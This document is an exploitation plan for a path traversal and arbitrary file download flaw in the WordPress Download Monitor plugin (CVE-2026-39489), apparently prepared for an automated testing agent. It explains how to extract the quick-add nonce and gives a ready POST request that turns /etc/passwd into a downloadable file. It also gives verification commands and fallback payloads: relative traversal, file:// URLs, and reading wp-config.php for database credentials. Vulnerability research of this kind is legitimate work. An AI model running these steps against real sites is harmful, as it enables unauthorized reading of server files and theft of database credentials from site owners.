Exploitation Research Plan - CVE-2026-39489

1. Vulnerability Summary

The Download Monitor plugin (up to 5.1.9) is vulnerable to Path Traversal and Arbitrary File Download. The vulnerability exists in the "Quick-add" download functionality within the Media Browser interface. Specifically, the plugin fails to properly validate the download_url parameter provided during the creation of a new download. This allows an authenticated user with sufficient privileges (Author and above, or any user with the manage_downloads capability) to create a download entry pointing to sensitive files on the server (e.g., /etc/passwd, wp-config.php). Once created, the attacker can download these files through the plugin's frontend download mechanism.

2. Attack Vector Analysis

• Endpoint: wp-admin/media-upload.php?tab=quick-add (Action triggered by media_upload_add_download hook)
• HTTP Method: POST
• Vulnerable Parameter: download_url
• Authentication: Author level or any user with manage_downloads capability.
• Preconditions: The attacker must have access to the Media Browser's "Insert Download" interface.

3. Code Flow

1. Entry Point: The class DLM_Admin_Media_Insert (in src/Admin/MediaInsert.php) registers the media_upload_add_download hook (line 34) which calls the media_browser() method.
2. Access Control: The media_browser() method checks if the current user has the manage_downloads capability (line 99).
3. Form Processing: If a POST request is sent with download_url and download_title, the method verifies the nonce quick-add-nonce (line 104).
4. Post Creation:
   • It creates a new dlm_download post (line 120).
   • It creates a corresponding dlm_download_version post (line 139).
5. Path Resolution: The plugin instantiates DLM_File_Manager and calls $file_manager->get_secure_path( $url ) using the user-provided $url (line 152).
6. Persistence: The resulting $file_path (which remains unvalidated for path traversal) is stored in the _files meta field of the dlm_download_version post (line 157).
7. Exploitation Sink: When a user requests the download via /?download=[ID], the plugin retrieves the path from the _files meta and serves the file content without checking if the file resides within an allowed directory.

4. Nonce Acquisition Strategy

The nonce is required for the quick-add action. It is generated using wp_create_nonce( 'quick-add' ) and embedded in the HTML of the Media Browser frame.

1. Navigate to the Media Browser: Open the "Insert Download" frame.
   • URL: wp-admin/media-upload.php?type=add_download&tab=quick-add
2. Extract Nonce: Use the browser context to read the value of the hidden input field.
   • JavaScript: document.querySelector('input[name="quick-add-nonce"]').value
   • Tool: browser_eval("document.querySelector('input[name=\"quick-add-nonce\"]').value")

5. Exploitation Strategy

1. Setup User: Log in as a user with the author role. Ensure the role has manage_downloads (standard for Download Monitor configurations).
2. Get Nonce: Navigate to the Media Upload page and extract the quick-add nonce.
3. Create Malicious Download: Send a POST request to wp-admin/media-upload.php?type=add_download&tab=quick-add to create a download pointing to /etc/passwd.
4. Identify Download ID: Use the response or WP-CLI to find the ID of the newly created dlm_download.
5. Read File: Navigate to the download URL on the frontend to retrieve the file content.

HTTP Request (Step 3):

POST /wp-admin/media-upload.php?type=add_download&tab=quick-add HTTP/1.1
Host: [TARGET_HOST]
Content-Type: application/x-www-form-urlencoded
Cookie: [AUTH_COOKIES]

download_url=/etc/passwd&download_title=SystemData&download_version=1.0&quick-add-nonce=[EXTRACTED_NONCE]

6. Test Data Setup

1. Plugin: Install and activate Download Monitor 5.1.9.
2. User:
   • wp user create attacker attacker@example.com --role=author --user_pass=password
   • wp cap add author manage_downloads (To satisfy the current_user_can('manage_downloads') check in src/Admin/MediaInsert.php).
3. Configuration: No specific settings required, as the vulnerability is in the default "Quick-add" logic.

7. Expected Results

• The POST request should return a success message in the HTML: <div class="updated"><p>Download successfully created.</p></div>.
• A new dlm_download post and dlm_download_version post will be visible in the database.
• Requesting /?download=[ID] will return the contents of the server's /etc/passwd file.

8. Verification Steps

1. Database Check: Verify the file path is stored.

   # Find the ID of the latest version
   VERSION_ID=$(wp post list --post_type=dlm_download_version --posts_per_page=1 --orderby=ID --order=DESC --field=ID)
   # Check the meta value
   wp post meta get $VERSION_ID _files
   

   Result should be a JSON-encoded string containing "/etc/passwd".
2. Download Check:
   • Locate the parent Download ID (post_parent of the version).
   • Use the http_request tool to fetch GET /?download=[ID].
   • Confirm the response contains root:x:0:0:.

9. Alternative Approaches

• Path Variants: If absolute paths are blocked, try relative traversal: ../../../../../../../../etc/passwd.
• Protocol Wrappers: If the plugin validates paths but not schemes, try file:///etc/passwd.
• WordPress Config: Target wp-config.php (relative to the WordPress root) to extract database credentials: download_url=../wp-config.php.
• REST API: Check if the REST API version creation (/wp-json/download-monitor/v1/downloads) is similarly unprotected, as hinted by the DLM_File_Manager usage.